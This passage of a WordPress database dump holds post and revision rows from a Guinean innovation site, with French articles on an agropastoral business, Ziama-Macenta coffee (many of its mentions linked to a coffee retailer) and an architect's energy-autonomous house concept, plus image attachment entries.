13:36:17','2017-10-26 13:36:17','Samba Sory Camaraest un ingénieur agricole avec son entreprise agropastoral Business Kinyapa, il prône et pratique l\'agriculture Bio et conventionnelle.\r\n\r\nRegardez cette petite vidéo...','Sambako et sa petite révolution agricole.','','inherit','closed','closed','','632-revision-v1','','','2017-10-26 13:36:17','2017-10-26 13:36:17','',632,'https://guineeinnove.nimbasolution.com/2017/10/26/632-revision-v1/',0,'revision','',0),(634,1,'2017-11-01 12:22:45','2017-11-01 12:22:45','Samba Sory Camara est un ingénieur agricole avec son entreprise agropastoral Business Kinyapa, il prône et pratique l\'agriculture Bio et conventionnelle.\nRegardez cette petite vidéo...https://www.youtube.com/watch?time_continue=16&amp;v=wQaejvxoQ2o','Sambako et sa petite révolution agricole.','','inherit','closed','closed','','632-autosave-v1','','','2017-11-01 12:22:45','2017-11-01 12:22:45','',632,'https://guineeinnove.nimbasolution.com/2017/10/26/632-autosave-v1/',0,'revision','',0),(635,1,'2017-10-26 13:47:06','2017-10-26 13:47:06','Samba Sory Camaraest un ingénieur agricole avec son entreprise agropastoral Business Kinyapa, il prône et pratique l\'agriculture Bio et conventionnelle.\nRegardez cette petite vidéo...https://www.youtube.com/watch?time_continue=16&#038;v=wQaejvxoQ2o','Sambako et sa petite révolution agricole.','','inherit','closed','closed','','632-revision-v1','','','2017-10-26 13:47:06','2017-10-26 13:47:06','',632,'https://guineeinnove.nimbasolution.com/2017/10/26/632-revision-v1/',0,'revision','',0),(636,1,'2017-10-26 13:50:06','2017-10-26 13:50:06','','samba','','inherit','open','closed','','samba','','','2017-10-26 13:50:06','2017-10-26 13:50:06','',632,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/samba.jpg',0,'attachment','image/jpeg',0),(637,1,'2017-10-26 13:50:11','2017-10-26 13:50:11','Samba Sory Camaraest un ingénieur agricole avec son entreprise agropastoral Business Kinyapa, il prône et pratique l\'agriculture Bio et conventionnelle.\r\nRegardez cette petite vidéo...https://www.youtube.com/watch?time_continue=16&amp;v=wQaejvxoQ2o','Sambako et sa petite révolution agricole.','','inherit','closed','closed','','632-revision-v1','','','2017-10-26 13:50:11','2017-10-26 13:50:11','',632,'https://guineeinnove.nimbasolution.com/2017/10/26/632-revision-v1/',0,'revision','',0),(638,1,'2017-10-26 14:17:43','2017-10-26 14:17:43','Le café ‘’Ziama’’ qui porte le nom de son origine géographique, est une nouvelle variété de qualité supérieure qui fait actuellement écho à travers le monde, a fait savoir le technologue du Laboratoire en caféiculture au Centre Régional de Recherche Agronomique de la Guinée Forestière (CRRA-GF), basé à Sérédou, M. Gono-yo Traoré, au cours d’un entretien.\r\n<img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/ziama-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" />\r\nM. Traoré a en outre indiqué, que ce café a été retenu meilleur <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> de qualité supérieure en Guinée après avoir organisé un test de tous les <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">cafés</a> produits actuellement dans les quatre régions naturelles de la Guinée. Le ‘’comportement agronomique’’ du<strong> <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> Ziama lié à son goût aromatique, acidulé et peu amer, son rendement élevé à l’hectare, sa résistance par rapport aux différentes maladies</strong>, sont entre autres les critères qui ont permis au Laboratoire de le classer parmi les meilleures qualités en Guinée, a-t-il ajouté.\r\nSelon toujours le technologue du Laboratoire, une étude comparative approfondie, réalisée par le Laboratoire au cours de l’année 2000, a également permis de savoir que le massif forestier de Ziama a une grande influence sur la qualité du <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a>…\r\nL’influence écologique du milieu, liée à la pluviométrie (9 mois et plus de pluie sur 12 mois de l’année) et à la végétation verdoyante, fait que n’importe quelle qualité de <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> planté dans le milieu peut<i> ‘’se comporter de la même manière’’</i>, a-t-il fait remarquer.\r\nIl a par ailleurs, plaidé pour un appui technique et financier à l’Association des Producteurs de <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">Café</a> (APC), afin que tout le processus de calibrage et de traitement de la nouvelle variété de <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> Ziama, soit fait sur place à Sérédou, en vue d’éviter les cas de fraude, a ajouté M. Traoré.\r\n<b>Le <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> Ziama Macenta de Guinée</b>, est un <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> robusta aux qualités exceptionnelles, proches de celle de l’Arabica. Cultivé en Guinée forestière sur le Mont Ziama, aux confins du Liberia et de la Côte d’Ivoire, le <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a>Ziama Macenta est un robusta particulier : sa saveur est acidulée et peu amer. Il se distingue par ses arômes persistants, à la fois forts et fins.\r\n<a href=\"https://www.maxicoffee.com/cafe-c-6.html\"><img title=\"\" src=\"http://www.guineeconakry.info/typo3temp/pics/93d50eb614.gif\" alt=\"\" width=\"300\" height=\"225\" border=\"0\" /></a>\r\nLa qualité de ce <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> dépend fortement des opérations de récolte et de post-récolte. Les cerises doivent être récoltées de manière sélective à maturité en trois passages. Elles sont triées par trempage puis séchées au soleil avec des remuages réguliers. Le séchage se fait essentiellement au soleil sur claies pendant trois semaines. Les cerises sèches sont ensuite décortiquées mécaniquement en évitant les brisures.\r\nSelon de nombreux témoignages des anciens, <i>« au temps des colons, les collecteurs passaient longtemps à Macenta pour augmenter la qualité de leur mélange »</i>. Le <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> de Macenta a ainsi acquis une notoriété auprès des importateurs et des torréfacteurs durant cette période. Il est encore utilisé aujourd’hui pour relever la base des <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">cafés</a> de plus mauvaise qualité.https://www.youtube.com/watch?v=0jeXbexRihs&amp;t=29s','Des Guinéens cultivent un café avec des qualités exceptionnelles.','','publish','open','open','','kerfalla-camara-cree-le-cafe-ziama-macenta','','','2017-11-01 12:18:58','2017-11-01 12:18:58','',0,'https://guineeinnove.nimbasolution.com/?p=638',0,'post','',0),(640,1,'2017-10-26 14:14:14','2017-10-26 14:14:14','','cafe_ziama_macenta-679x380','','inherit','open','closed','','cafe_ziama_macenta-679x380','','','2017-10-26 14:14:14','2017-10-26 14:14:14','',638,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/cafe_ziama_macenta-679x380.jpg',0,'attachment','image/jpeg',0),(641,1,'2017-10-26 14:14:33','2017-10-26 14:14:33','','ziama','','inherit','open','closed','','ziama','','','2017-10-26 14:14:33','2017-10-26 14:14:33','',638,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/ziama.jpg',0,'attachment','image/jpeg',0),(642,1,'2017-10-26 14:16:24','2017-10-26 14:16:24','Le café ‘’Ziama’’ qui porte le nom de son origine géographique, est une nouvelle variété de qualité supérieure qui fait actuellement écho à travers le monde, a fait savoir le technologue du Laboratoire en caféiculture au Centre Régional de Recherche Agronomique de la Guinée Forestière (CRRA-GF), basé à Sérédou, M. Gono-yo Traoré, au cours d’un entretien.\n<img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/ziama-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" />\nM. Traoré a en outre indiqué, que ce café a été retenu meilleur <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> de qualité supérieure en Guinée après avoir organisé un test de tous les <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">cafés</a> produits actuellement dans les quatre régions naturelles de la Guinée. Le ‘’comportement agronomique’’ du<strong> <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> Ziama lié à son goût aromatique, acidulé et peu amer, son rendement élevé à l’hectare, sa résistance par rapport aux différentes maladies</strong>, sont entre autres les critères qui ont permis au Laboratoire de le classer parmi les meilleures qualités en Guinée, a-t-il ajouté.\nSelon toujours le technologue du Laboratoire, une étude comparative approfondie, réalisée par le Laboratoire au cours de l’année 2000, a également permis de savoir que le massif forestier de Ziama a une grande influence sur la qualité du <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a>…\nL’influence écologique du milieu, liée à la pluviométrie (9 mois et plus de pluie sur 12 mois de l’année) et à la végétation verdoyante, fait que n’importe quelle qualité de <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> planté dans le milieu peut<i> ‘’se comporter de la même manière’’</i>, a-t-il fait remarquer.\nIl a par ailleurs, plaidé pour un appui technique et financier à l’Association des Producteurs de <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">Café</a> (APC), afin que tout le processus de calibrage et de traitement de la nouvelle variété de <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> Ziama, soit fait sur place à Sérédou, en vue d’éviter les cas de fraude, a ajouté M. Traoré.\n<b>Le <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> Ziama Macenta de Guinée</b>, est un <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> robusta aux qualités exceptionnelles, proches de celle de l’Arabica. Cultivé en Guinée forestière sur le Mont Ziama, aux confins du Liberia et de la Côte d’Ivoire, le <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a>Ziama Macenta est un robusta particulier : sa saveur est acidulée et peu amer. Il se distingue par ses arômes persistants, à la fois forts et fins.\n<a href=\"https://www.maxicoffee.com/cafe-c-6.html\"><img title=\"\" src=\"http://www.guineeconakry.info/typo3temp/pics/93d50eb614.gif\" alt=\"\" width=\"300\" height=\"225\" border=\"0\" /></a>\nLa qualité de ce <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> dépend fortement des opérations de récolte et de post-récolte. Les cerises doivent être récoltées de manière sélective à maturité en trois passages. Elles sont triées par trempage puis séchées au soleil avec des remuages réguliers. Le séchage se fait essentiellement au soleil sur claies pendant trois semaines. Les cerises sèches sont ensuite décortiquées mécaniquement en évitant les brisures.\nSelon de nombreux témoignages des anciens, <i>« au temps des colons, les collecteurs passaient longtemps à Macenta pour augmenter la qualité de leur mélange »</i>. Le <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> de Macenta a ainsi acquis une notoriété auprès des importateurs et des torréfacteurs durant cette période. Il est encore utilisé aujourd’hui pour relever la base des <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">cafés</a> de plus mauvaise qualité.https://www.youtube.com/watch?v=0jeXbexRihs&#038;t=29s','Kerfalla Camara crée le café Ziama-Macenta.','','inherit','closed','closed','','638-revision-v1','','','2017-10-26 14:16:24','2017-10-26 14:16:24','',638,'https://guineeinnove.nimbasolution.com/2017/10/26/638-revision-v1/',0,'revision','',0),(643,1,'2017-10-26 14:17:43','2017-10-26 14:17:43','Le café ‘’Ziama’’ qui porte le nom de son origine géographique, est une nouvelle variété de qualité supérieure qui fait actuellement écho à travers le monde, a fait savoir le technologue du Laboratoire en caféiculture au Centre Régional de Recherche Agronomique de la Guinée Forestière (CRRA-GF), basé à Sérédou, M. Gono-yo Traoré, au cours d’un entretien.\r\n<img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/ziama-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" />\r\nM. Traoré a en outre indiqué, que ce café a été retenu meilleur <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> de qualité supérieure en Guinée après avoir organisé un test de tous les <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">cafés</a> produits actuellement dans les quatre régions naturelles de la Guinée. Le ‘’comportement agronomique’’ du<strong> <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> Ziama lié à son goût aromatique, acidulé et peu amer, son rendement élevé à l’hectare, sa résistance par rapport aux différentes maladies</strong>, sont entre autres les critères qui ont permis au Laboratoire de le classer parmi les meilleures qualités en Guinée, a-t-il ajouté.\r\nSelon toujours le technologue du Laboratoire, une étude comparative approfondie, réalisée par le Laboratoire au cours de l’année 2000, a également permis de savoir que le massif forestier de Ziama a une grande influence sur la qualité du <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a>…\r\nL’influence écologique du milieu, liée à la pluviométrie (9 mois et plus de pluie sur 12 mois de l’année) et à la végétation verdoyante, fait que n’importe quelle qualité de <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> planté dans le milieu peut<i> ‘’se comporter de la même manière’’</i>, a-t-il fait remarquer.\r\nIl a par ailleurs, plaidé pour un appui technique et financier à l’Association des Producteurs de <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">Café</a> (APC), afin que tout le processus de calibrage et de traitement de la nouvelle variété de <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> Ziama, soit fait sur place à Sérédou, en vue d’éviter les cas de fraude, a ajouté M. Traoré.\r\n<b>Le <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> Ziama Macenta de Guinée</b>, est un <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> robusta aux qualités exceptionnelles, proches de celle de l’Arabica. Cultivé en Guinée forestière sur le Mont Ziama, aux confins du Liberia et de la Côte d’Ivoire, le <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a>Ziama Macenta est un robusta particulier : sa saveur est acidulée et peu amer. Il se distingue par ses arômes persistants, à la fois forts et fins.\r\n<a href=\"https://www.maxicoffee.com/cafe-c-6.html\"><img title=\"\" src=\"http://www.guineeconakry.info/typo3temp/pics/93d50eb614.gif\" alt=\"\" width=\"300\" height=\"225\" border=\"0\" /></a>\r\nLa qualité de ce <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> dépend fortement des opérations de récolte et de post-récolte. Les cerises doivent être récoltées de manière sélective à maturité en trois passages. Elles sont triées par trempage puis séchées au soleil avec des remuages réguliers. Le séchage se fait essentiellement au soleil sur claies pendant trois semaines. Les cerises sèches sont ensuite décortiquées mécaniquement en évitant les brisures.\r\nSelon de nombreux témoignages des anciens, <i>« au temps des colons, les collecteurs passaient longtemps à Macenta pour augmenter la qualité de leur mélange »</i>. Le <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> de Macenta a ainsi acquis une notoriété auprès des importateurs et des torréfacteurs durant cette période. Il est encore utilisé aujourd’hui pour relever la base des <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">cafés</a> de plus mauvaise qualité.https://www.youtube.com/watch?v=0jeXbexRihs&amp;t=29s','Kerfalla Camara crée le café Ziama-Macenta.','','inherit','closed','closed','','638-revision-v1','','','2017-10-26 14:17:43','2017-10-26 14:17:43','',638,'https://guineeinnove.nimbasolution.com/2017/10/26/638-revision-v1/',0,'revision','',0),(645,1,'2017-10-26 14:51:03','2017-10-26 14:51:03','<img class=\"alignnone size-medium wp-image-417\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-300x169.jpg\" alt=\"\" width=\"300\" height=\"169\" />\n\nMoustapha Haidara est un jeune architecte Guinéen, considéré par ses pairs comme le meilleur de tous. Il a crée un concept de maison particulièrement innovant ayant des caractéristiques particulière:\n\n-<strong>Toit en bois:</strong> avec un toit en bois effectuant des rotations sous l\'influence du vent, produisant ainsi de l\'énergie d\'origine éolienne pour la maison.\n\n-<strong>Triple vitrage: </strong>rempli d\'argon de gaz très isolent et des capteurs solaires permettant ainsi à la maison d\'avoir une seconde source d’énergie en plus de l’énergie d\'origine éolienne.\n\n<strong>-Mur en lambris de bois: </strong>le bois économise de l’énergie, c\'est un excellent isolant.\n\n<strong>-Mur en lambris de bois:  </strong>économise de l’énergie et conserve la fraîcheur.\n\n<strong>-Végétation persistante:</strong> Afin d\'éviter les déperditions dues au vent.\n\n&nbsp;\n\n&nbsp;','Un architecte Guinéen crée un concept de maison autonome en Energie!','','inherit','closed','closed','','416-autosave-v1','','','2017-10-26 14:51:03','2017-10-26 14:51:03','',416,'https://guineeinnove.nimbasolution.com/2017/10/26/416-autosave-v1/',0,'revision','',0),(646,1,'2017-10-26 14:46:29','2017-10-26 14:46:29','Moustapha Haidara est un jeune architecte Guinéen, considéré par ses pairs comme le meilleur de tous. Il a crée un concept de maison particulièrement innovant ayant des caractéristiques particulière:\r\n\r\n-<strong>Toit en bois:</strong> avec un toit en bois effectuant des rotations sous l\'influence du vent, produisant ainsi de l\'énergie d\'origine éolienne pour la maison.\r\n\r\n-<strong>Triple vitrage: </strong>rempli d\'argon de gaz très isolent et des capteurs solaires permettant ainsi à la maison d\'avoir une seconde source d’énergie en plus de l’énergie d\'origine éolienne.\r\n\r\n<strong>-Mur en lambris de bois: </strong>le bois économise de l’énergie, c\'est un excellent isolant\r\n\r\n&nbsp;','Un architecte Guinéen crée un concept de maison autonome en Energie!','','inherit','closed','closed','','416-revision-v1','','','2017-10-26 14:46:29','2017-10-26 14:46:29','',416,'https://guineeinnove.nimbasolution.com/2017/10/26/416-revision-v1/',0,'revision','',0),(647,1,'2017-10-26 14:49:59','2017-10-26 14:49:59','Moustapha Haidara est un jeune architecte Guinéen, considéré par ses pairs comme le meilleur de tous. Il a crée un concept de maison particulièrement innovant ayant des caractéristiques particulière:\r\n\r\n-<strong>Toit en bois:</strong> avec un toit en bois effectuant des rotations sous l\'influence du vent, produisant ainsi de l\'énergie d\'origine éolienne pour la maison.\r\n\r\n-<strong>Triple vitrage: </strong>rempli d\'argon de gaz très isolent et des capteurs solaires permettant ainsi à la maison d\'avoir une seconde source d’énergie en plus de l’énergie d\'origine éolienne.\r\n\r\n<strong>-Mur en lambris de bois: </strong>le bois économise de l’énergie, c\'est un excellent isolant.\r\n\r\n<strong>-Mur en lambris de bois:  </strong>économise de l’énergie et conserve la fraîcheur.\r\n\r\n<strong>-Végétation persistante:</strong> Afin d\'éviter les déperditions dues au vent.\r\n\r\n&nbsp;','Un architecte Guinéen crée un concept de maison autonome en Energie!','','inherit','closed','closed','','416-revision-v1','','','2017-10-26 14:49:59','2017-10-26 14:49:59','',416,'https://guineeinnove.nimbasolution.com/2017/10/26/416-revision-v1/',0,'revision','',0),(648,1,'2017-10-26 14:54:23','2017-10-26 14:54:23','<img class=\"alignnone size-medium wp-image-417\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-300x169.jpg\" alt=\"\" width=\"300\" height=\"169\" />\r\n\r\nMoustapha Haidara est un jeune architecte Guinéen, considéré par ses pairs comme le meilleur de tous. Il a crée un concept de maison particulièrement innovant ayant des caractéristiques particulière:\r\n\r\n-<strong>Toit en bois:</strong> avec un toit en bois effectuant des rotations sous l\'influence du vent, produisant ainsi de l\'énergie d\'origine éolienne pour la maison.\r\n\r\n-<strong>Triple vitrage: </strong>rempli d\'argon de gaz très isolent et des capteurs solaires permettant ainsi à la maison d\'avoir une seconde source d’énergie en plus de l’énergie d\'origine éolienne.\r\n\r\n<strong>-Mur en lambris de bois: </strong>le bois économise de l’énergie, c\'est un excellent isolant.\r\n\r\n<strong>-Mur en lambris de bois:  </strong>économise de l’énergie et conserve la fraîcheur.\r\n\r\n<strong>-Végétation persistante:</strong> Afin d\'éviter les déperditions dues au vent.\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Un architecte Guinéen crée un concept de maison autonome en Energie!','','inherit','closed','closed','','416-revision-v1','','','2017-10-26 14:54:23','2017-10-26 14:54:23','',416,'https://guineeinnove.nimbasolution.com/2017/10/26/416-revision-v1/',0,'revision','',0),(649,1,'2017-10-26 14:55:36','2017-10-26 14:55:36','','2','','inherit','open','closed','','2','','','2017-10-26 14:55:36','2017-10-26 14:55:36','',0,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2.jpg',0,'attachment','image/jpeg',0),(650,1,'2017-10-26 14:55:48','2017-10-26 14:55:48','','3','','inherit','open','closed','','3','','','2017-10-26 14:55:48','2017-10-26 14:55:48','',0,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg',0,'attachment','image/jpeg',0),(651,1,'2017-10-26 14:56:07','2017-10-26 14:56:07','','4','','inherit','open','closed','','4','','','2017-10-26 14:56:07','2017-10-26 14:56:07','',0,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4.jpg',0,'attachment','image/jpeg',0),(652,1,'2017-10-26 14:56:25','2017-10-26 14:56:25','','6','','inherit','open','closed','','6','','','2017-10-26 14:56:25','2017-10-26 14:56:25','',0,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6.jpg',0,'attachment','image/jpeg',0),(653,1,'2017-10-26 14:56:41','2017-10-26 14:56:41','','6','','inherit','open','closed','','6-2','','','2017-10-26 14:56:41','2017-10-26 14:56:41','',0,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1.jpg',0,'attachment','image/jpeg',0),(654,1,'2017-10-26 14:57:05','2017-10-26 14:57:05','<img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-300x169.jpg\" alt=\"\" width=\"300\" height=\"169\" />\nMoustapha Haidara est un jeune architecte Guinéen, considéré par ses pairs comme le meilleur de tous. Il a crée un concept de maison particulièrement innovant ayant des caractéristiques particulière:\n-<strong>Toit en bois:</strong> avec un toit en bois effectuant des rotations sous l\'influence du vent, produisant ainsi de l\'énergie d\'origine éolienne pour la maison.\n-<strong>Triple vitrage: </strong>rempli d\'argon de gaz très isolent et des capteurs solaires permettant ainsi à la maison d\'avoir une seconde source d’énergie en plus de l’énergie d\'origine éolienne.\n<strong>-Mur en lambris de bois: </strong>le bois économise de l’énergie, c\'est un excellent isolant.\n<strong>-Mur en lambris de bois:  </strong>économise de l’énergie et conserve la fraîcheur.\n<strong>-Végétation persistante:</strong> Afin d\'éviter les déperditions dues au vent.\n&nbsp;\n&nbsp;		\n			<figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"usnd9qg\" href=\'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte.jpg\'><img width=\"150\" height=\"150\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-150x150.jpg\" alt=\"\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"usnd9qg\" href=\'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4.jpg\'><img width=\"150\" height=\"150\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4-150x150.jpg\" alt=\"\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"usnd9qg\" href=\'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg\'><img width=\"150\" height=\"150\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3-150x150.jpg\" alt=\"\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"usnd9qg\" href=\'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2.jpg\'><img width=\"150\" height=\"150\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2-150x150.jpg\" alt=\"\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"usnd9qg\" href=\'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6.jpg\'><img width=\"150\" height=\"150\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-150x150.jpg\" alt=\"\" /></a>\n			</figure><figure class=\'gallery-item\'>\n				<a data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"usnd9qg\" href=\'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1.jpg\'><img width=\"150\" height=\"150\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1-150x150.jpg\" alt=\"\" /></a>\n			</figure>\n		','Un architecte Guinéen crée un concept de maison autonome en Energie!','','inherit','closed','closed','','416-revision-v1','','','2017-10-26 14:57:05','2017-10-26 14:57:05','',416,'https://guineeinnove.nimbasolution.com/2017/10/26/416-revision-v1/',0,'revision','',0),(655,1,'2017-10-26 15:00:27','2017-10-26 15:00:27','','moustapha','','inherit','open','closed','','moustapha','','','2017-10-26 15:00:27','2017-10-26 15:00:27','',416,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/moustapha.jpg',0,'attachment','image/jpeg',0),(656,1,'2017-10-26 15:00:33','2017-10-26 15:00:33','<img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-300x169.jpg\" alt=\"\" width=\"300\" height=\"169\" />\r\nMoustapha Haidara est un jeune architecte Guinéen, considéré par ses pairs comme le meilleur de tous. Il a crée un concept de maison particulièrement innovant ayant des caractéristiques particulière:\r\n-<strong>Toit en bois:</strong> avec un toit en bois effectuant des rotations sous l\'influence du vent, produisant ainsi de l\'énergie d\'origine éolienne pour la maison.\r\n-<strong>Triple vitrage: </strong>rempli d\'argon de gaz très isolent et des capteurs solaires permettant ainsi à la maison d\'avoir une seconde source d’énergie en plus de l’énergie d\'origine éolienne.\r\n<strong>-Mur en lambris de bois: </strong>le bois économise de l’énergie, c\'est un excellent isolant.\r\n<strong>-Mur en lambris de bois:  </strong>économise de l’énergie et conserve la fraîcheur.\r\n<strong>-Végétation persistante:</strong> Afin d\'éviter les déperditions dues au vent.\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte.jpg\" data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4.jpg\" data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg\" data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2.jpg\" data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6.jpg\" data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1.jpg\" data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" /></a></figure>','Un architecte Guinéen crée un concept de maison autonome en Energie!','','inherit','closed','closed','','416-revision-v1','','','2017-10-26 15:00:33','2017-10-26 15:00:33','',416,'https://guineeinnove.nimbasolution.com/2017/10/26/416-revision-v1/',0,'revision','',0),(657,1,'2017-10-26 15:01:40','2017-10-26 15:01:40','Moustapha Haidara est un jeune architecte Guinéen, considéré par ses pairs comme le meilleur de tous. Il a crée un concept de maison particulièrement innovant ayant des caractéristiques particulière:\r\n-<strong>Toit en bois:</strong> avec un toit en bois effectuant des rotations sous l\'influence du vent, produisant ainsi de l\'énergie d\'origine éolienne pour la maison.\r\n-<strong>Triple vitrage: </strong>rempli d\'argon de gaz très isolent et des capteurs solaires permettant ainsi à la maison d\'avoir une seconde source d’énergie en plus de l’énergie d\'origine éolienne.\r\n<strong>-Mur en lambris de bois: </strong>le bois économise de l’énergie, c\'est un excellent isolant.\r\n<strong>-Mur en lambris de bois:  </strong>économise de l’énergie et conserve la fraîcheur.\r\n<strong>-Végétation persistante:</strong> Afin d\'éviter les déperditions dues au vent.\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte.jpg\" data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4.jpg\" data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" /></a></figure>\r\n<figure class=\"gallery-item\"><a href=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg\" data-elementor-open-lightbox=\"default\" data-elementor-lightbox-slideshow=\"usnd9qg\"><img 